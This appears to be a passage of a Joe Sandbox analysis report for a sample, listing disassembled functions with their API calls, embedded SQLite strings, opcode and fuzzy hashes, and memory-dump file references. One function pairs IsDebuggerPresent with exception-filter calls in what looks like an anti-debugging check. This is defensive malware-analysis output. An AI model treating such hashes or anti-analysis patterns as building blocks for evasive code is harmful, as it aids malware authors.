Opcode Fuzzy Hash: ccaac09e1e641ffcc00240f61ab722d0c653f2b843106517fe14b1d85f9e583e
Instruction Fuzzy Hash: 70C16A716083468FC714CF18C591B2AB7E2FF89718F184A5DE8869B391D771EC46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E7CD56 Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00E7CE4E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E7CE58
UnhandledExceptionFilter.KERNEL32(?), ref: 00E7CE65

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ace88262d3cce79ce1cb644acbd917807aa6acec1c46335a12e7d9ffffd252da
Instruction ID: 93c413b291663147a0bd6e5e9a29f6733aa454f519e9ddff2993cf6832749b5d
Opcode Fuzzy Hash: ace88262d3cce79ce1cb644acbd917807aa6acec1c46335a12e7d9ffffd252da
Instruction Fuzzy Hash: F131C474901228ABCB21DF69D889B9DBBF8FF58310F5095EAE40CA7251E7709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00DB9C70 Relevance: 4.5, Strings: 3, Instructions: 775COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00DB9DDE, 00DBA595, 00DBA5CF
1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00DB9DCF, 00DBA586, 00DBA5C0
database corruption, xrefs: 00DB9DD9, 00DBA590, 00DBA5CA

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
API String ID: 0-3078602584
Opcode ID: 89f09274575561b0c9b7cf9eb653655e3d97bc240530d0278544d2bef3122f93
Instruction ID: 21561dc32632b5c54baf7b723822802a437ae080e7eb3f9224a321868093a649
Opcode Fuzzy Hash: 89f09274575561b0c9b7cf9eb653655e3d97bc240530d0278544d2bef3122f93
Instruction Fuzzy Hash: DD52F771608790CFC714CF2CC4506AAFBE2AFC5354F188A6DE4EB9B291D771D8468B62

Uniqueness

Uniqueness Score: -1.00%

Function 00E89887 Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00E89886,00000000,?,00000000,00000000,00000000,00000000), ref: 00E898A9
TerminateProcess.KERNEL32(00000000,?,00E89886,00000000,?,00000000,00000000,00000000,00000000), ref: 00E898B0
ExitProcess.KERNEL32 ref: 00E898C2

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8164de9344f12e7174f9fb3409f4f53106534efba454132d6d7b04d525ceb7cb
Instruction ID: 01b9f042f5eefa8ee0b942102828a3f98d766a8eb274dce126174b97ccb60b64
Opcode Fuzzy Hash: 8164de9344f12e7174f9fb3409f4f53106534efba454132d6d7b04d525ceb7cb
Instruction Fuzzy Hash: 64E0B631801108AFCF15BF66DD59A693FA9EB56355F085424F90EA6133CB35ED85CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1030 Relevance: 4.3, Strings: 3, Instructions: 566COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00DB1424
1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00DB1415
database corruption, xrefs: 00DB141F

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
API String ID: 0-3078602584
Opcode ID: 6ffbe0dafa768e1c6522fe1b393096c58d49331daa74f8e123601bf75fec1ccd
Instruction ID: 5b202c02d82865397d204ffbcdf2e1490307951617aad5482d31fe9a1cb77651
Opcode Fuzzy Hash: 6ffbe0dafa768e1c6522fe1b393096c58d49331daa74f8e123601bf75fec1ccd
Instruction Fuzzy Hash: 9B227C74604201DFD714DF18C491BAAB7E6FF88314F9985A9E84A9B352DB31EC81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA8A80 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 633COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA9192

Strings

:memory:, xrefs: 00DA8AD7

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: :memory:
API String ID: 885266447-2920599690
Opcode ID: 482189945f8f9b8af5fd02ca2fea8be546a66f4960c53e8250b18b2ebb13fc78
Instruction ID: a08d5d367bd1817acfa986064e30df9a5cef91d54d3c0fb81af0e979a72d430d
Opcode Fuzzy Hash: 482189945f8f9b8af5fd02ca2fea8be546a66f4960c53e8250b18b2ebb13fc78
Instruction Fuzzy Hash: EA32C2B0A012058FDF24CF29DC95B6AB7B5FF46304F1880A9E8499B352DB31DD55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DAA380 Relevance: 4.1, Strings: 3, Instructions: 374COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00DAA453
1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00DAA444
database corruption, xrefs: 00DAA44E

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$database corruption
API String ID: 0-3078602584
Opcode ID: c5eac60434ae99660ed1a791be119f460e15c2310579c07d7f0d659880ca944a
Instruction ID: 03865d58b4a2c9598451a6955de888cd26806dbea1fcd2a3391562fa48516712
Opcode Fuzzy Hash: c5eac60434ae99660ed1a791be119f460e15c2310579c07d7f0d659880ca944a
Instruction Fuzzy Hash: DCD1A1716042019FD758DF28C881A6AB7E6FFC9314F49866DF8499B352DB31EC41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DEDC80 Relevance: 4.1, Strings: 2, Instructions: 1615COMMON

Download Yara Rule

Strings

%s.%s, xrefs: 00DEDDF6
5, xrefs: 00DEEEF2

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s.%s$5
API String ID: 0-2511244239
Opcode ID: ee6dd174c9068b8fa79b24249e1a2eb4ea0d571c29f87c1c026835b5f5889ccc
Instruction ID: dae40afdb3a0313606baa1ce19c3e32242f9873d44b314db9515632dc3ba1c07
Opcode Fuzzy Hash: ee6dd174c9068b8fa79b24249e1a2eb4ea0d571c29f87c1c026835b5f5889ccc
Instruction Fuzzy Hash: 95F26B746043818FD724EF1AC480B6AB7E2FF88304F19895DE8998B392DB75E945CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00DEF9B0 Relevance: 3.8, Strings: 2, Instructions: 1266COMMON

Download Yara Rule

Strings

BINARY, xrefs: 00DF069E
), xrefs: 00DF01F1

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: )$BINARY
API String ID: 0-1060320443
Opcode ID: 2f1c28ace5a523c4a7b047fab2e8fc70bbeb640094bdcaae806d11e426d8b169
Instruction ID: bf2e1daf301583b93b69f79606632f5f0dac892aea315584810c3292f04650d0
Opcode Fuzzy Hash: 2f1c28ace5a523c4a7b047fab2e8fc70bbeb640094bdcaae806d11e426d8b169
Instruction Fuzzy Hash: 1CC28B706047458FD724EF19C090B26BBE2FF88304F2AC56DE9898B352DB75E855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00DB59C0 Relevance: 2.9, Strings: 2, Instructions: 436COMMON

Download Yara Rule

Strings

@p, xrefs: 00DB5ABB
%s%s, xrefs: 00DB5DB6

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s%s$@p
API String ID: 0-872721496
Opcode ID: 8cef7906b1c069f8af39916966424ef0e3d8c3b78955343305d6609fdf88b336
Instruction ID: 2aa537ff8c8686f91f50b2586834cd066c26a8e1952694322bf0179940c83e61
Opcode Fuzzy Hash: 8cef7906b1c069f8af39916966424ef0e3d8c3b78955343305d6609fdf88b336
Instruction Fuzzy Hash: 4DF1CF70604B41CBC714DF28E451BAAB7E2EFC9318F08865DF88A4B295DB35D945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DCFB50 Relevance: 2.5, Strings: 1, Instructions: 1239COMMON

Download Yara Rule

Strings

w, xrefs: 00DD0312

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: d154a7d19afac2a189bd35c66e16b7bd413fc11aa12cdae150f90eabed063270
Instruction ID: cfd8f360cc4bfd4e49579ec9bc072e56cfa8647bfef9872f8e42c2d1f9b96417
Opcode Fuzzy Hash: d154a7d19afac2a189bd35c66e16b7bd413fc11aa12cdae150f90eabed063270
Instruction Fuzzy Hash: 3FC278746047419FC724DF18C090F66BBE2FF88304F59856EE98A8B362DB35E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3BB0 Relevance: 2.3, APIs: 1, Instructions: 803COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB432C

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: efd1a30591b66a30a152b9032aeff51f8b64c71ca6dcd2ac4ac22bf44b7f98d8
Instruction ID: 50af1ae32e18d5d36557db0eea2f471cf5863287e8c1e2291041bc27c9c2731e
Opcode Fuzzy Hash: efd1a30591b66a30a152b9032aeff51f8b64c71ca6dcd2ac4ac22bf44b7f98d8
Instruction Fuzzy Hash: 1D626E70A04211DFDB28DF28C480B6AB7E1FF89314F19866DE85A8B352D731ED51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DCE250 Relevance: 2.1, Strings: 1, Instructions: 807COMMON

Download Yara Rule

Strings

USING INDEX %s FOR IN-OPERATOR, xrefs: 00DCE8C7

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: USING INDEX %s FOR IN-OPERATOR
API String ID: 0-3230214820
Opcode ID: d0ec73aa18289d17229bf554f0e6ace85778f5a7e7bff03fa47b5d4e83116e19
Instruction ID: 9829f6ec5096c79b44bab6fbdc7e103de61f1db7d3d2cf3d9ac200da7c7dbb10
Opcode Fuzzy Hash: d0ec73aa18289d17229bf554f0e6ace85778f5a7e7bff03fa47b5d4e83116e19
Instruction Fuzzy Hash: 8C726DB5A043528FD714CF18C080F2AB7E2BF99354F298A5DE8859B356D731EC46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA65A0 Relevance: 2.0, APIs: 1, Instructions: 512COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00DA697F

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: __allrem
String ID:
API String ID: 2933888876-0
Opcode ID: a571c27e6a2c7ef2bc8755ca7f486c9b1de396f3761353c85a05775911868642
Instruction ID: 4cc50f256bdaa7174321bccd7255ffe29c2b4b8b38ee48d6195572d9c5ff7365
Opcode Fuzzy Hash: a571c27e6a2c7ef2bc8755ca7f486c9b1de396f3761353c85a05775911868642
Instruction Fuzzy Hash: 36122771E00219DFDB14CFA8D880BADB7B1BF49314F188169E819AB381E775ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A440 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 00D9A6B5

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: b5cb51524cf7a3dd0a40138d915acb728908a9ceb724d678e7aba8fa1e370716
Instruction ID: 77b5cb96c75e8b4871d311f808e453c2973c1fd1b1e0fcc30315deb7c12c87ca
Opcode Fuzzy Hash: b5cb51524cf7a3dd0a40138d915acb728908a9ceb724d678e7aba8fa1e370716
Instruction Fuzzy Hash: 8F917472A003099FDF20CFA9DC457AEB7F5FF48700F14851AE945F6290D7B599848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1A50 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e01bb0bdf0a727822d1b70637504813a50fdf2e878646b1a02fb8b1957fe3b
Instruction ID: 2b86786298706ef7a135653b5a2eb9372c053345bf2aa4b464b11317e62fa84d
Opcode Fuzzy Hash: 51e01bb0bdf0a727822d1b70637504813a50fdf2e878646b1a02fb8b1957fe3b
Instruction Fuzzy Hash: 5402AC75604601DFD718DF18C490BAAB7E2FF89314F99859DE84A8B752DB30EC81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD3AE0 Relevance: .5, Instructions: 463COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6baca151484d4aaaaf72be803a1a00b6cb07512d293c273b0263e9d59c0dcab6
Instruction ID: 45ee45722894b745e629e7b92cd3569f23193193e38691bcc1df193457876b88
Opcode Fuzzy Hash: 6baca151484d4aaaaf72be803a1a00b6cb07512d293c273b0263e9d59c0dcab6
Instruction Fuzzy Hash: D90215716043458FC714DF28C491B6ABBF5FF88314F04856EE98A8B352DB36E915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DD4120 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256d5bc54f95aeaddca2c201c92bcc701eb6706a767acde0bfcbb030fa132891
Instruction ID: 41aca9fd8bcd4308d787c3a2b1f578ad0aa4d054a7f913f17c12ab89f5f057da
Opcode Fuzzy Hash: 256d5bc54f95aeaddca2c201c92bcc701eb6706a767acde0bfcbb030fa132891
Instruction Fuzzy Hash: 6F0216716043458FCB14DF18D891BABBBE5FF89314F04856EE88A8B352DB31E915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D97A30 Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b413b450b6141e4674338a2ecdc4adc52c900c237aec3267e8d031adb433e9
Instruction ID: 81c5cb2a3cbadb2ab27609d7753364d48c3a337278df9c5e27684c77a86115f9
Opcode Fuzzy Hash: 76b413b450b6141e4674338a2ecdc4adc52c900c237aec3267e8d031adb433e9
Instruction Fuzzy Hash: A3E14D7251C2828FDF15CE3CC4912A9BBD2EFA5310F1C4AA9E8D587382D235D949C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D92380 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46270d271d1c4384f9c6c9f20a35ae36dce7d629cb473f6d4f56e25074be42ed
Instruction ID: fa2404d08cb4cb4e30654f74aaea011689219042a51ca07d6daa31c845c68816
Opcode Fuzzy Hash: 46270d271d1c4384f9c6c9f20a35ae36dce7d629cb473f6d4f56e25074be42ed
Instruction Fuzzy Hash: 1ED13574A00605AFDF24CF69D894BAAB7F1FF48304F18846DD85AAB342DB34E945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DA5090 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
